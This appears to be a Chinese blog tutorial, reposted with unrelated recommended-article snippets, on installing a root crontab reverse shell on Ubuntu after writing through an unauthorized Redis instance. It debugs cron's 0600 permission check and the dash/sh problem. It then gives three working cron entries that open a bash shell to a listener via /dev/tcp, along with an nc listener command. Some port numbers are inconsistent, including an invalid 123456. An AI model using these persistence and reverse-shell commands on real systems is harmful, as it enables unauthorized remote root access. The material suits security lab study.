ubuntu利用crontab反弹shell_ubuntu新增crontab反弹shell-程序员宅基地
技术标签: 安全 web安全 ubuntu 运维 linux 提权
事情源于自,我利用redis未授权访问漏洞在向ubuntu的/varspool/cron/crontabs目录下创建的任务计划文件去反弹shell时,发现shell并不能反弹到自己的centos2上
(1)在ubuntu中进入/var/spool/cron/crontabs/目录
cd /var/spool/cron/crontabs/(2)新建一个名为root的任务计划文件
touch root注:root文件的权限必须是600,否则会出现错误影响后面的实验
(3)编辑内容
* * * * * '/bin/bash -i >& /dev/tcp/192.168.159.201/123456 0>&1' (4)在centos2上监听着 12345端口
nc -lvvp 12345
这时按道理来说我们监听了后就应该回弹的,这里等待了一会后并没有回弹
(5)现在查看日志
tail -l /var/log/syslog
Sep 26 09:18:01 ubuntu-virtual-machine cron[568]: (root) INSECURE MODE (mode 0600 expected) (crontabs/root)通过日志我们可以发现权限644有问题
(6)现在尝试给root文件授权为600
chmod 600 root 这时还是并没有回弹
(7)现在就还尝试将root文件删除后,直接在创建时授权为600
root@utuntu000:/var/spool/cron/crontabs# rm -rf root
root@utuntu000:/var/spool/cron/crontabs# touch root
root@utuntu000:/var/spool/cron/crontabs# chmod 600 root然后给root中再次编辑内容
(8)然后再次尝试回弹
这时还是并没有回弹
(9)这是再次去查看报错日志
tail -l /var/log/syslog
这一条,我们之所以反弹失败,和这句话有很大的关系,百度一番后,大概的意思就是我们任务计划中的命令执行如果出现了错误,ubunti会将这些错误信息去输出到ubutu系统的邮件服务器,但是由于ubuntu系统默认没有安装邮件服务器,所以导致了这个错误
(10)修改任务计划文件为
* * * * * '/bin/bash -i >& /dev/tcp/192.168.159.201/12345 0>&1' >/tmp/error.txt 2>&1
//将错误输出到指定文件夹(11)现在去查看 /tmp/error.txt文件查看报错信息
tail /tmp/error.txt 
这里的错误表示:执行它的/bin/bash没有被找到,因为这个文件是使用/bin/sh执行的
可以使用ls -al查看/bin/sh,发现/bin/sh 是dash的一个软连接
(12)解决方案
方法1:修改软连接的指向为/bin/bash
ln -s -f bash /bin/sh并且将root文件修改为:
* * * * * '/bin/bash -i >& /dev/tcp/192.168.159.201/12345 0>&1' 注:为什么centos就没有这个问题,因为centos默认的处理方式就是/bin/bash
现在再次尝试反弹
就可以看到成功的反弹了
方法2:就是避免在cron文件里面去使用bash这个shell,我们可以另外的去建立一个反弹shell脚本文件,然后去任务计划里面直接调用这个脚本文件
shell脚本文件如下,名为tmp/test.sh
#!bin/bash
/bin/bash -i > &/dev/tcp/192.168.159.201/12345 0>&1然后为test.sh加上执行权限
chmod +x /tmp/test.sh之后任务计划里面的内容修改为
* * * * * /tmp/test.sh最后尝试反弹
可以看到成功的反弹了shell
方法3:直接使用sh
修改文件为
*/1 * * * * bash -c '/bin/bash -i >& /dev/tcp/192.168.159.201/123456 0>&1' 不用修改链接指向,直接在sh下执行bash -c
可以看到已经成功的弹窗了!
智能推荐
java常见面试题(160道)_java面试题-程序员宅基地
文章浏览阅读5.4w次,点赞89次,收藏746次。java常见面试题_java面试题
LeetCode刷题总结(C语言版)_leetcode c语言-程序员宅基地
文章浏览阅读5.4k次,点赞6次,收藏73次。编程总结每每刷完一道题后,其思想和精妙之处没有地方记录,本篇博客用以记录刷题过程中的遇到的算法和技巧001)两数之和给定一个整数数组 nums 和一个目标值 target,请你在该数组中找出和为目标值的两个整数。你可以假设每种输入只会对应一个答案。但是,你不能重复利用这个数组中同样的元素。给定 nums = [2, 7, 11, 15], target = 9因为 nums[0] ..._leetcode c语言
小程序开发者工具正常显示,但是真机调试和真机中安卓加载正常ios加载首页失败,首页的请求返回204_苹果 sec-fetch-dest-程序员宅基地
文章浏览阅读125次。检查请求头中的’sec-fetch-dest’: ‘document’ ,是否进行了特殊处理(node层)_苹果 sec-fetch-dest
ansible 批量安装zabbix-agent-程序员宅基地
文章浏览阅读321次。服务器初始化(这是在建立在新的服务器基础上做的初始化)关闭防火墙、selinux,添加epel常用源,安装常用工具、添加普通用户并禁止root1、服务器批量初始化[root@fwd ansible]# cat init.yml 系统初始化脚本---- hosts: all tasks: - name: disable selinux、firew..._ansible批量安装zabbix-agent
java日志系统--log4j配置解析过程,源码分析_log4j 源码分析 读取配置-程序员宅基地
文章浏览阅读1.4w次,点赞3次,收藏2次。Logger.getLogger(Test.class);从getLogger开始,就启动了log4j的整个工作流程,通过调用LogManager获取logger实例return LogManager.getLogger(clazz.getName());LogManager类里面有个静态块static{},【初始化重要信息】【root logger】,做一些配置,其中url = Loader.ge_log4j 源码分析 读取配置
心灵震撼《一个8岁女孩的遗书》看完能有几人不哭…-程序员宅基地
文章浏览阅读533次。无奈的父亲有一个美丽的小女孩,她的名字叫余艳,她有一双亮晶晶的大眼睛她有一颗透明的童心.她是一个孤儿,她在这个世界上只活了8年,她留在这个世界上最后的一句话是“我来过,我很乖”她希望死在秋天,纤瘦的身体就像一朵花自然开谢的过程.在遍地黄花堆积,落叶空中旋舞的时候,她会看见横空远行的雁儿们.她自愿放弃治疗,把全世界华人捐给她的54万分成了7份,把生命当成希望的蛋糕分给了7个正徘徊在生死线上的小
随便推点
EV/HEV中的牵引逆变器驱动优化-程序员宅基地
文章浏览阅读1.6k次,点赞42次,收藏35次。什么是牵引逆变器?从本质上讲,牵引逆变器是电动汽车动力系统中的一个子系统,它从电池中获取高电压,并将其转换为交流电压——因此被称为逆变器——并基本上为电机供电。它控制电机速度和扭矩,直接影响效率和可靠性,这正成为牵引逆变器设计的设计挑战。此图片来源于网络如今的电动汽车至少有一个牵引逆变器。有些型号实际上不止一个。一个在前轴上,一个在后轴上。甚至一些高端车型实际上每个车轮都有一个牵引逆变器。因此,效率和可靠性非常重要。所以,从逆变器和电机控制的市场趋势来看——从技术趋势来看,我们看到了功率水平的提高。
Ubuntu之apt命令_ubuntu18.04 atp命令使用技巧-程序员宅基地
文章浏览阅读134次。简介apt-cache和apt-get是apt包的管理工具,他们根据/etc/apt/sources.list里的软件源地址列表搜索目标软件、并通过维护本地软件包列表来安装和卸载软件。查看本机是否安装软件:whereis package_name 或者which package_name1.搜索软件sudo apt-cache search pa..._ubuntu18.04 atp命令使用技巧
查询Dynamics 365的Audit History_dynamics 审核历史记录如何查询-程序员宅基地
文章浏览阅读150次。【代码】查询Dynamics 365的Audit History。_dynamics 审核历史记录如何查询
python yield函数的用法-程序员宅基地
文章浏览阅读1.3w次,点赞15次,收藏66次。什么是yield函数?yield函数是python里面的关键字,带有yield的函数相当于一个生成器generator.当你使用一个yield的时候,对应的函数就是一个生成器在python里面类似于return函数,他们主要的区别就是:遇到return会直接返回值,不会执行接下来的语句.但是yield并不是,在本次迭代返回之后,yield函数在下一次迭代时,从上一次迭代遇到的yield后面的代码(下一行)开始执行下面是案例分析:案例一:def gen_generator(): yiel_yield函数
【QT笔记】QFile读文件问题_qfileread后指针会移动吗-程序员宅基地
文章浏览阅读917次。如果不用seek(0)的话,默认是自己会把读取文件的指针后移的,不用手动后移;_qfileread后指针会移动吗
dw8051基本测试示例_dw8051 part1-程序员宅基地
文章浏览阅读2.5k次。整理了网上一份简单的dw8051测试示例,共享到云盘:http://pan.baidu.com/s/1bnu9lZT1.目录如下:---dut ---rtl:DW8051的core文件 ---model:ROM和RAM的model文件---testbench ---rtl.f:filelist文件 ---test_top.v:仿真的top_dw8051 part1